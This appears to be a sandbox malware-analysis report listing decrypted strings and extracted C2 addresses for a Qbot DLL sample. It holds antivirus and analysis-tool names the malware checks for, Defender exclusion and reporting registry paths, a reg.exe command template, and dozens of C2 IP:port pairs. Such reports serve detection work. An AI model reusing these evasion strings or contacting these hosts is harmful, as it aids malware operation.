Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: shell32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: TRUE
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_Bios
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: c:\hiberfil.sysss
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: /
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ByteFence.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: type=0x%04X
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: snxhk_border_mywnd
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ROOT\CIMV2
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: https
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: fshoster32.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: kernelbase.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: regsvr32.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %s\system32\
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_Process
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: rundll32.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: LOCALAPPDATA
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: cmd.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: APPDATA
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: select
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: .exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: mcshield.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: advapi32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ws2_32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: .cfg
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_Product
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: WQL
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: wininet.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: LastBootUpTime
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: S:(ML;;NW;;;LW)
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: urlmon.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Create
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_PnPEntity
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Initializing database...
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: winsta0\default
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: .dat
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: WBJ_IGNORE
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: next
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: wpcap.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: image/pjpeg
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: fmon.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: vbs
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: aswhooka.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SysWOW64
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: mpr.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: image/gif
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: crypt32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ntdll.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: open
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\wextract.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %u.%u.%u.%u.%u.%u.%04x
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SystemRoot
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: cscript.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: MBAMService.exe;mbamgui.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\xwizard.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\wermgr.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: C:\INTERNAL\__empty
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: .dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_PhysicalMemory
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: image/jpeg
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: LocalLow
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: displayName
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: shlwapi.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\WerFault.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: CommandLine
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: kernel32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SubmitSamplesConsent
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: 1234567890
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: wbj.go
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\wextract.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_DiskDrive
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: vkise.exe;isesrv.exe;cmdagent.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: System32
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Name
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\WerFault.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: WRSA.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: c:\\
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SpyNetReporting
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: FALSE
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: aswhookx.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Packages
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SonicWallClientProtectionService.exe;SWDash.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: application/x-shockwave-flash
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: RepUx.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\mspaint.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Winsta0
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\wermgr.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: avp.exe;kavtray.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: root\SecurityCenter2
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: MsMpEng.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: userenv.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: csc_ui.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: \\.\pipe\
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: pstorec.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: NTUSER.DAT
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: from
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\sethc.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: netapi32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\Utilman.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: gdi32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: setupapi.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SELECT * FROM Win32_Processor
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: iphlpapi.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Caption
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: CrAmTray.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_ComputerSystem
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: user32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: xagtnotif.exe;AppUIMonitor.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\dxdiag.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: \sf2.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\grpconv.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: egui.exe;ekrn.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Software\Microsoft
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %S.%06d
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: bcrypt.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SELECT * FROM AntiVirusProduct
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\SndVol.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\Utilman.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: wtsapi32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\xwizard.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: shell32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: TRUE
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_Bios
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SELECT * FROM Win32_OperatingSystem
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\mobsync.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: c:\hiberfil.sysss
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: /
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ByteFence.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: type=0x%04X
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: snxhk_border_mywnd
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ROOT\CIMV2
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: https
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\explorer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: fshoster32.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: kernelbase.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: regsvr32.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %s\system32\
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_Process
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: rundll32.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: LOCALAPPDATA
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: cmd.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: APPDATA
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: select
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: .exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: mcshield.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: advapi32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ws2_32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: .cfg
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: aabcdeefghiijklmnoopqrstuuvwxyyz
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_Product
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: WQL
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: wininet.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: LastBootUpTime
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: S:(ML;;NW;;;LW)
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\CertEnrollCtrl.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: urlmon.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Create
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Win32_PnPEntity
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\grpconv.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Initializing database...
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\SearchIndexer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: winsta0\default
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: .dat
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: WBJ_IGNORE
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: next
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\AtBroker.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: wpcap.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\sethc.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: image/pjpeg
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: fmon.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: bdagent.exe;vsserv.exe;vsservppl.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\SndVol.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: vbs
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: aswhooka.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: SysWOW64
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\mspaint.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: mpr.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: image/gif
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: crypt32.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: ntdll.dll
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: open
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\explorer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: CSFalconService.exe;CSFalconContainer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\wextract.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\System32\mobsync.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: %SystemRoot%\SysWOW64\SearchIndexer.exe
Source: 16.2.rundll32.exe.2960978.0.raw.unpack	String decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName

Source: 050_qbot.dll

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE, DLL

Source: unknown

HTTPS traffic detected: 68.87.41.40:443 -> 192.168.2.3:49720 version: TLS 1.2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_10009E70 FindFirstFileW,FindNextFileW,

16_2_10009E70

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 86.173.2.12:2222
Source: Malware configuration extractor	IPs: 92.9.45.20:2222
Source: Malware configuration extractor	IPs: 100.4.163.158:2222
Source: Malware configuration extractor	IPs: 213.64.33.92:2222
Source: Malware configuration extractor	IPs: 75.98.154.19:443
Source: Malware configuration extractor	IPs: 78.192.109.105:2222
Source: Malware configuration extractor	IPs: 88.126.94.4:50000
Source: Malware configuration extractor	IPs: 70.28.50.223:2083
Source: Malware configuration extractor	IPs: 92.154.17.149:2222
Source: Malware configuration extractor	IPs: 24.234.220.88:993
Source: Malware configuration extractor	IPs: 87.252.106.39:995
Source: Malware configuration extractor	IPs: 174.4.89.3:443
Source: Malware configuration extractor	IPs: 12.172.173.82:20
Source: Malware configuration extractor	IPs: 90.29.86.138:2222
Source: Malware configuration extractor	IPs: 70.160.67.203:443
Source: Malware configuration extractor	IPs: 223.166.13.95:995
Source: Malware configuration extractor	IPs: 184.181.75.148:443
Source: Malware configuration extractor	IPs: 95.45.50.93:2222
Source: Malware configuration extractor	IPs: 201.143.215.69:443
Source: Malware configuration extractor	IPs: 64.121.161.102:443
Source: Malware configuration extractor	IPs: 2.82.8.80:443
Source: Malware configuration extractor	IPs: 188.28.19.84:443
Source: Malware configuration extractor	IPs: 81.101.185.146:443
Source: Malware configuration extractor	IPs: 79.77.142.22:2222
Source: Malware configuration extractor	IPs: 84.215.202.8:443
Source: Malware configuration extractor	IPs: 183.87.163.165:443
Source: Malware configuration extractor	IPs: 74.12.147.139:2078
Source: Malware configuration extractor	IPs: 74.12.147.139:2222
Source: Malware configuration extractor	IPs: 74.12.147.139:2222
Source: Malware configuration extractor	IPs: 74.12.147.139:2083
Source: Malware configuration extractor	IPs: 70.28.50.223:2078
Source: Malware configuration extractor	IPs: 94.204.202.106:443
Source: Malware configuration extractor	IPs: 87.221.153.182:2222
Source: Malware configuration extractor	IPs: 70.28.50.223:2087
Source: Malware configuration extractor	IPs: 24.234.220.88:990
Source: Malware configuration extractor	IPs: 2.49.63.160:2222
Source: Malware configuration extractor	IPs: 72.205.104.134:443
Source: Malware configuration extractor	IPs: 199.27.66.213:443
Source: Malware configuration extractor	IPs: 83.249.198.100:2222
Source: Malware configuration extractor	IPs: 90.104.151.37:2222
Source: Malware configuration extractor	IPs: 116.75.63.183:443
Source: Malware configuration extractor	IPs: 70.28.50.223:2078
Source: Malware configuration extractor	IPs: 117.195.17.148:993
Source: Malware configuration extractor	IPs: 77.126.99.230:443
Source: Malware configuration extractor	IPs: 45.62.70.33:443
Source: Malware configuration extractor	IPs: 24.234.220.88:465
Source: Malware configuration extractor	IPs: 203.109.44.236:995
Source: Malware configuration extractor	IPs: 75.109.111.89:443
Source: Malware configuration extractor	IPs: 161.142.103.187:995
Source: Malware configuration extractor	IPs: 77.86.98.236:443
Source: Malware configuration extractor	IPs: 147.147.30.126:2222
Source: Malware configuration extractor	IPs: 124.246.122.199:2222
Source: Malware configuration extractor	IPs: 103.123.223.133:443
Source: Malware configuration extractor	IPs: 180.151.19.13:2078
Source: Malware configuration extractor	IPs: 176.142.207.63:443
Source: Malware configuration extractor	IPs: 12.172.173.82:32101
Source: Malware configuration extractor	IPs: 103.140.174.20:2222
Source: Malware configuration extractor	IPs: 70.50.83.216:2222
Source: Malware configuration extractor	IPs: 12.172.173.82:465
Source: Malware configuration extractor	IPs: 38.2.18.164:443
Source: Malware configuration extractor	IPs: 93.187.148.45:995
Source: Malware configuration extractor	IPs: 70.64.77.115:443
Source: Malware configuration extractor	IPs: 12.172.173.82:21
Source: Malware configuration extractor	IPs: 70.49.205.198:2222
Source: Malware configuration extractor	IPs: 27.0.48.233:443
Source: Malware configuration extractor	IPs: 12.172.173.82:50001
Source: Malware configuration extractor	IPs: 83.110.223.61:443
